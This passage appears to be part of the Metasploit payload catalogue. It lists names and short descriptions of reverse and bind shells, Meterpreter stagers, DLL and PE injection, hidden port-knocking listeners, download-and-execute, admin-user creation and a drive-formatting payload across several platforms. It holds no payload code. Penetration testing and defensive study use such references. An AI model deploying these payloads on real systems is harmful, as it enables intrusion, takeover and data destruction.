Connect, read length, read buffer, execute\nosx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell\nosx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell\nphp/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\nphp/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6\nphp/bind_php Listen for a connection and spawn a command shell via php\nphp/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)\nphp/download_exec Download an EXE from an HTTP URL and execute it\nphp/exec Execute a single system command\nphp/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection\nphp/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6\nphp/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\nphp/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support\nphp/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)\nphp/reverse_perl Creates an interactive shell via perl\nphp/reverse_php Reverse PHP connect back shell with checks for disabled functions\nphp/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably agood idea to use a bind or reverse shell unless firewalls prevent them from working. 
The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\npython/meterpreter/bind_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection\npython/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support\npython/meterpreter/reverse_http Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP\npython/meterpreter/reverse_https Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL\npython/meterpreter/reverse_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker\npython/meterpreter/reverse_tcp_ssl Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL\npython/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support\npython/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell\npython/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\npython/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\npython/pingback_reverse_tcp Connects back to the attacker, sends a UUID, then terminates\npython/shell_bind_tcp Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp_ssl Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\npython/shell_reverse_udp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\nr/shell_bind_tcp Continually listen for a connection and spawn a command shell via R\nr/shell_reverse_tcp Connect back and create a command shell via R\nruby/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\nruby/pingback_reverse_tcp Connect back to the attacker, sends a UUID, then terminates\nruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_reverse_tcp Connect back and create a command shell via Ruby\nruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL\nsolaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/sparc/shell_find_port Spawn a shell on an established connection\nsolaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nsolaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/x86/shell_find_port Spawn a shell on an established connection\nsolaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ntty/unix/interact Interacts with a TTY on an established socket connection\nwindows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. 
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\nwindows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)\nwindows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)\nwindows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)\nwindows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)\nwindows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection\nwindows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)\nwindows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection\nwindows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as ahop.\nwindows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)\nwindows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. 
Tunnel communication over HTTP\nwindows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6\nwindows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)\nwindows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support\nwindows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)\nwindows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload\nwindows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it\nwindows/exec Execute an arbitrary command\nwindows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.\nwindows/loadlibrary Load an arbitrary library path\nwindows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon\nwindows/meterpreter/bind_hidden_ipknock_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. Thesocket will appear as "closed," thus helping to hide the shellcode\nwindows/meterpreter/bind_hidden_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/meterpreter/bind_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)\nwindows/meterpreter/bind_ipv6_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/meterpreter/bind_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)\nwindows/meterpreter/bind_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)\nwindows/meterpreter/bind_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)\nwindows/meterpreter/bind_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection\nwindows/meterpreter/bind_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Listen for a connection with UUID Support (Windows x86)\nwindows/meterpreter/find_tag Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection\nwindows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/meterpreter/reverse_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)\nwindows/meterpreter/reverse_http_proxy_pstore Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP\nwindows/meterpreter/reverse_https Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)\nwindows/meterpreter/reverse_https_proxy Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support\nwindows/meterpreter/reverse_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6\nwindows/meterpreter/reverse_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/meterpreter/reverse_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Connect back to the attacker (No NX)\nwindows/meterpreter/reverse_ord_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_allports Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/meterpreter/reverse_tcp_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support\nwindows/meterpreter/reverse_winhttp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)\nwindows/meterpreter/reverse_winhttps Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)\nwindows/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.\nwindows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nwindows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nwindows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)\nwindows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupdllinject/bind_named_pipe Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\nwindows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. 
Listen for a connection (No NX)\nwindows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)\nwindows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection\nwindows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)\nwindows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection\nwindows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6\nwindows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)\nwindows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support\nwindows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). 
After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)\nwindows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/bind_named_pipe Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)\nwindows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)\nwindows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)\nwindows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection\nwindows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection\nwindows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6\nwindows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)\nwindows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). 
Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support\nwindows/peinject/bind_hidden_ipknock_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection.First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you couldget your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/peinject/bind_hidden_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . 
Listen for a connectionfrom a hidden port and spawn a command shell to the allowed host.\nwindows/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection (Windows x86)\nwindows/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a pipe connection (Windows x86)\nwindows/peinject/bind_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(No NX)\nwindows/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(Windows x86)\nwindows/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection\nwindows/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. 
PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionwith UUID Support (Windows x86)\nwindows/peinject/find_tag Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Use an established connection\nwindows/peinject/reverse_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker over IPv6\nwindows/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . 
Connect back to the attacker via a named pipe pivot\nwindows/peinject/reverse_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker (No NX)\nwindows/peinject/reverse_ord_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_allports Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/peinject/reverse_tcp_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. 
This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker with UUID Support\nwindows/pingback_bind_tcp Open a socket and report UUID when a connection is received (Windows x86)\nwindows/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x86)\nwindows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)\nwindows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). 
Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/shell/bind_named_pipe Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)\nwindows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)\nwindows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)\nwindows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection\nwindows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/shell/find_tag Spawn a piped command shell (staged). Use an established connection\nwindows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6\nwindows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)\nwindows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell/reverse_udp Spawn a piped command shell (staged). 
Connect back to the attacker with UUID Support\nwindows/shell_bind_tcp Listen for a connection and spawn a command shell\nwindows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell\nwindows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.\nwindows/shell_reverse_tcp Connect back to attacker and spawn a command shell\nwindows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API\nwindows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)\nwindows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/upexec/bind_named_pipe Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)\nwindows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)\nwindows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)\nwindows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection\nwindows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). 
